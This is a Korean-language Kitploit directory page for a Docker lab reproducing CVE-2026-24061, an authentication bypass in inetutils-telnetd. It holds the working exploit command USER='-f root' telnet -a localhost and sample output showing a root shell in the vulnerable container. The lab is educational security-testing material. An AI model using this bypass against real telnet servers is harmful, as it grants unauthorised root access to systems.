Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
inetutils-telnetd-auth-bypass — A small docker lab to play with cve-2026-24061, the inetutils-telnetd authentication bypass. | Kitploit
도구/GitHubGitHub/leonjza/inetutils-telnetd-auth-bypass
Vulnerability AnalysisExploitationPenetration TestingAuthenticationLabs & Practice
GitHubleonjza/inetutils-telnetd-auth-bypass

inetutils-telnetd-auth-bypass

A small docker lab to play with cve-2026-24061, the inetutils-telnetd authentication bypass.

저장소 보기

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
1257개월 전아직 검토되지 않음
공유

inetutils-telnetd 인증 우회 실습 환경, CVE-2026-24061

oss-sec 메일링 리스트에 공개된 inetutils-telnetd 1.9.3 - 2.7의 인증 우회를 실습하기 위한 소규모 실습 환경입니다. [0]

이 컨테이너는 Debian 11 (Bullseye)에서 inetutils-telnetd가 여전히 취약한 버전이라는 사실에 의존합니다. 이 문서를 작성하는 시점의 버전은 다음과 같습니다:

root@kitploit:~
root@ba8cc6858b87:/# apt search inetutils-telnetd
Sorting... Done
Full Text Search... Done
inetutils-telnetd/oldoldstable 2:2.0-1+deb11u2 arm64
  telnet server

빌드

docker build -t telnetd-exploit . 명령으로 저장소를 클론하고 컨테이너를 빌드합니다.

실행

docker run --rm -it telnetd-exploit 명령으로 컨테이너를 실행합니다. PoC가 메시지로 표시됩니다.

root@kitploit:~
docker run --rm -it telnetd-exploit
Starting internet superserver: inetd.
You are user1. Try telnet as root with: USER='-f root' telnet -a localhost
user1@114102afa5d3:/$

성공적인 실행 결과는 다음과 같습니다:

root@kitploit:~
user1@114102afa5d3:/$ USER='-f root' telnet -a localhost Trying ::1... Trying 127.0.0.1... Connected to localhost. Escape character is '^]'. Linux 6.17.8 (114102afa5d3) (pts/1) Linux 114102afa5d3 6.17.8 #1 SMP PREEMPT Thu Nov 20 09:34:02 UTC 2025 aarch64 The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. root@114102afa5d3:~#

[0] https://seclists.org/oss-sec/2026/q1/89

도구 다운로드